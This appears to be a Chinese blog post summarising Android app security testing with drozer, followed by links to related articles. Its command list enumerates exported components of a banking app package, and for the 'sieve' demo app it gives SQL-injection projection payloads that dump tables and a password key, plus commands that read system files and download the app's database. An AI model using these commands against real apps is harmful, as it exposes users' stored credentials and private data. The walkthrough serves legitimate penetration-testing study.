drozer 测试总结
工具:drozer,源码地址:https://github.com/mwrlabs/drozer/
1.准备工作
1.运行 drozer-agent.apk
2.选择 embedded–enable
3.设置端口转发:adb forward tcp:31415 tcp:31415
运行:
drozer.bat console connect
进入dz>界面
2.开始测试
- 列出详细 APP 信息:
dz> run app.package.info -a com.bankcomm.tokyo
- 查看 APP 的配置信息
dz> run app.package.manifest com.bankcomm.tokyo
3.分析是否存在攻击攻击点
dz> run app.package.attacksurface com.bankcomm.tokyo
4.查看暴露的 provider 权限
dz> run app.provider.info -a com.bankcomm.tokyo
5.获取 Activity 信息
dz> run app.activity.info -a com.bankcomm.tokyo
6.检测 SQL 注入
dz> run scanner.provider.injection -a com.bankcomm.tokyo
7.检测目录遍历
dz> run scanner.provider.traversal -a com.bankcomm.tokyo
8.获取所有可访问的 Uri
dz> run scanner.provider.finduris -a com.bankcomm.tokyo
9.SQL 注入
dz> run app.provider.query content://com.bankcomm.tokyo.DBContentProvider/Passwords/
列出所有表
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM SQLITE_MASTER WHERE type='table';--"
获取单表(如 Key)的数据
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM Key;--"
10.读取文件系统下的文件
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
11.下载数据库文件到本地
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db
drozer 测试总结相关推荐
- drozer与adb工具的安装与使用
drozer:链接: https://pan.baidu.com/s/1skTJdgh 密码: wah1 adb:链接: https://pan.baidu.com/s/1gfpIkuv 密码: n8 ...
- Android测试(二)——drozer使用
drozer启动: 1)首先在模拟 器或者安卓设备上开启drozer; 2)然后打开adb,转发端口: adb forward tcp:31415 tcp:31415 3)在电脑上开启drozer: ...
- 软件测试——系统测试总结报告模板
软件测试--系统测试总结报告模板 目录 编写目的 背景 用户群 定义 测试对象 测试阶段 测试工具 参考资料 测试概要 进度回顾 测试执行 测试用例 测试环境 网络拓扑 测试结果 Bug趋势图 问题类 ...
- Drozer快速使用指南
1.简介: Drozer是一款用于测试android应用程序漏洞的安全评估工具,能够发现多种类型的安全的漏洞,免费版本的相关资源下载地址: https://www.mwrinfosecurity.co ...
- 性能测试总结(三)--工具选型篇
性能测试总结(三)--工具选型篇 本篇文章主要简单总结下性能测试工具的原理以及如何选型.性能测试和功能测试不同,性能测试的执行是基本功能的重复和并发,需要模拟多用户,在性能测试执行时需要监控指标参数, ...
- 20175305张天钰 《java程序设计》第四周课下测试总结
第四周课下测试总结 错题 某方法在父类的访问权限是public,则子类重写时级别可以是protected. A .true B .false 正确答案:B 解析:书P122:子类不允许降低方法的访问权 ...
- 入门级----测试的执行、环境的搭建、每日构建、测试记录和跟踪、回归测试、测试总结和报告...
测试用例的准备,都是为了执行测试准备的. 测试环境的搭建 (1)测试数据:有些测试需要使用大批量的数据,例如容量测试.压力测试等.根据产品的具体测试要求,可能需要在数据库表插入大量的数据,准备大量的文 ...
- android冒烟测试自动化,安卓自动化测试总结(五)——测试结果发送及内容展示...
安卓自动化测试总结(五)--测试结果发送及内容展示 使用jenkins自动构建并完成自动化测试后,如果想看测试结果,都需要打开jenkins构建地址,找到对应的构建及构建结果.这样做很麻烦,关心自动化 ...
- C++对象内存布局测试总结
C++对象内存布局测试总结 http://hi.baidu.com/����/blog/item/826d38ff13c32e3a5d6008e8.html 上文是半年前对虚函数.虚拟继承的理解.可能 ...
最新文章
- 从0到1,苏宁API网关的演进之路
- 如何在MARKDOWN编辑器设置表格的宽度?
- [Java] 基本資料包裝類別 Wrapper Classes
- armv8/armv9页表属性(page descriptor)的详细介绍
- Codeforces 982 C. Cut 'em all! 图的遍历
- 6.变量的使用.rs
- 源码与tarball套件管理程序笔记摘录
- 用JQuery操作元素的style属性
- 【算法】剑指 Offer 29. 顺时针打印矩阵
- Hyperledger Fabric 命令整理
- HTTP/2之服务器推送(Server Push)最佳实践
- DIY远程控制开关(tiny6410+LED+yeelink+curl)
- X射线辩材--CT原理
- 信息收集工具之hping安装和使用
- 有哪些好用的论文检索网站?
- 华三H3C路由器配置FTP服务并使用电脑连接ftp传输文件
- 第十七章、程序管理与 SELinux 初探
- css3 图片阴影、翘边效果
- Camera Tuning 常见缩写
- SSO 轻量级实现指南(原生 Java 实现):SSO Client 部分